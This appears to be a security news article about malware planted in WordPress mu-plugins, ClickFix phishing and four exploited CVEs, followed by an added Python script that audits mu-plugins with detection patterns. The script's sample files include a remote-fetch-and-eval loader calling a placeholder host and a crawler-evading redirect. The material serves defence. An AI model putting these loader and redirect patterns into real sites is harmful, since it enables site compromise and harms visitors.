
Threat actors are abusing the "mu-plugins" directory of WordPress sites to plant malicious code that gives them persistent remote access and lets them redirect visitors to fraudulent websites. Must-use plugins live in wp-content/mu-plugins; WordPress loads every PHP file at the top level of that directory on every request, with no activation step, and they cannot be deactivated from the Plugins page (they are listed only under a separate Must-Use tab). A file dropped there runs automatically and is easy to overlook, which makes the directory an attractive hiding place for malware.
According to Sucuri's research, three kinds of malicious PHP files have been found in these directories:
- redirect.php: redirects visitors to an external malicious website.
- index.php: gives attackers web-shell-like capabilities by fetching a remote PHP script and executing it, allowing arbitrary code execution.
- custom-js-loader.php: injects spam into the affected site, possibly to promote scams or manipulate SEO, replacing images with explicit content and hijacking outbound links.
The redirect.php script masquerades as a browser update to trick visitors into installing malware that steals personal information or drops additional payloads. It also includes bot detection: search engine crawlers are served the normal page, which keeps the redirect out of crawl results that could otherwise expose it.
Alongside these infections, threat actors are also using compromised WordPress sites as launchpads for phishing pages that prompt visitors to run malicious PowerShell commands under the pretext of a Google reCAPTCHA or Cloudflare CAPTCHA verification, a technique known as ClickFix. In the observed campaign this delivers the Lumma Stealer malware.
While it remains unclear how these particular sites were compromised, the usual entry points are outdated plugins or themes, weak administrator credentials, and server misconfigurations.
Separately, Patchstack reports four critical WordPress vulnerabilities that have been actively exploited since the beginning of 2025:
- CVE-2024-27956 (CVSS score: 9.9): Unauthenticated arbitrary SQL execution vulnerability in the WordPress Automatic Plugin.
- CVE-2024-25600 (CVSS score: 10.0): Unauthenticated remote code execution vulnerability in the Bricks theme.
- CVE-2024-8353 (CVSS score: 10.0): Unauthenticated PHP object injection leading to remote code execution in the GiveWP plugin.
- CVE-2024-4345 (CVSS score: 10.0): An unauthenticated arbitrary file upload vulnerability in the Startklar Elementor Addons for WordPress.
To mitigate these threats, WordPress site operators should keep plugins and themes updated, audit site code regularly for malicious content (including wp-content/mu-plugins, where nothing needs activation to run), enforce strong passwords, and deploy a web application firewall to block malicious requests and code injection attempts.
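The script below is an added example, not code from the original article or from Sucuri, showing one way to carry out the mu-plugins audit recommended above. It flags any file not on an operator-maintained inventory and looks for the behaviours described earlier: an external redirect paired with crawler detection, a remote fetch followed by eval, and common payload-decoding calls. The indicator patterns, the inventory allowlist and the stand-in sample files it writes to a temporary directory are all constructed for illustration and are not real malware.

```python
"""Heuristic audit of a WordPress wp-content/mu-plugins directory.

Added example, not code from the article or from Sucuri. Indicator
patterns, the allowlist and the sample files are assumptions made
for illustration.
"""
from __future__ import annotations

import re
import sys
import tempfile
from pathlib import Path
from typing import Iterable

# Behaviours described for the loaders: a redirect with bot detection,
# a remote fetch followed by eval, and generic signs of a staged payload.
# These are heuristics; obfuscated code will not match them.
INDICATORS = [
    ("remote-fetch", re.compile(
        r"\b(file_get_contents|curl_init|wp_remote_get|fopen)\s*\(\s*['\"]https?://", re.I)),
    ("dynamic-eval", re.compile(r"\b(eval|create_function)\s*\(", re.I)),
    ("encoded-payload", re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("external-redirect", re.compile(
        r"\b(header\s*\(\s*['\"]Location:\s*|wp_redirect\s*\(\s*['\"])https?://", re.I)),
    ("bot-detection", re.compile(
        r"HTTP_USER_AGENT.{0,120}(googlebot|bingbot|crawler|spider)", re.I | re.S)),
    ("request-controlled-code", re.compile(
        r"\b(eval|include|require|system|shell_exec|passthru)\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
]


def scan_mu_plugins(mu_dir: Path, expected: Iterable[str] = ()) -> dict[str, list[str]]:
    """Return {relative path: [labels]} for every file that is either not on
    the expected inventory or matches at least one indicator pattern.

    The whole tree is walked, not just top-level .php files: WordPress only
    auto-loads the top level, but a loader file there can include anything.
    """
    inventory = set(expected)
    findings: dict[str, list[str]] = {}
    for path in sorted(p for p in mu_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(mu_dir).as_posix()
        hits: list[str] = []
        if rel not in inventory:
            hits.append("unexpected-file")
        text = path.read_text(encoding="utf-8", errors="ignore")
        hits.extend(label for label, rx in INDICATORS if rx.search(text))
        if hits:
            findings[rel] = hits
    return findings


def build_sample_dir() -> Path:
    """Write constructed stand-ins (assumed, not real malware) to a temp dir:
    one legitimate hardening mu-plugin and two files shaped like the
    redirect.php and index.php loaders described in the article."""
    root = Path(tempfile.mkdtemp(prefix="mu-plugins-"))
    (root / "disable-file-edit.php").write_text(
        "<?php\n// Legitimate hardening mu-plugin placed by the operator\n"
        "if (!defined('DISALLOW_FILE_EDIT')) { define('DISALLOW_FILE_EDIT', true); }\n"
    )
    (root / "redirect.php").write_text(
        "<?php\n"
        "$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');\n"
        "if (strpos($ua, 'googlebot') !== false || strpos($ua, 'bingbot') !== false) { return; }\n"
        "header('Location: https://example.invalid/browser-update.html');\nexit;\n"
    )
    (root / "index.php").write_text(
        "<?php\n"
        "$code = file_get_contents('https://example.invalid/stage2.txt');\n"
        "eval($code);\n"
    )
    return root


if __name__ == "__main__":
    # Usage: python audit_mu_plugins.py /path/to/wp-content/mu-plugins [expected files...]
    if len(sys.argv) > 1:
        target, known = Path(sys.argv[1]), sys.argv[2:]
    else:
        target, known = build_sample_dir(), ["disable-file-edit.php"]
    for rel, labels in scan_mu_plugins(target, known).items():
        print(f"{rel}: {', '.join(labels)}")
```

Pattern matching of this kind catches the plain variants described above but not obfuscated ones, so the inventory check (every file you did not place there is a finding) is the part to rely on; on a real site, pass the live wp-content/mu-plugins path and the list of files you know belong there, and confirm the directory has not been relocated with WPMU_PLUGIN_DIR in wp-config.php.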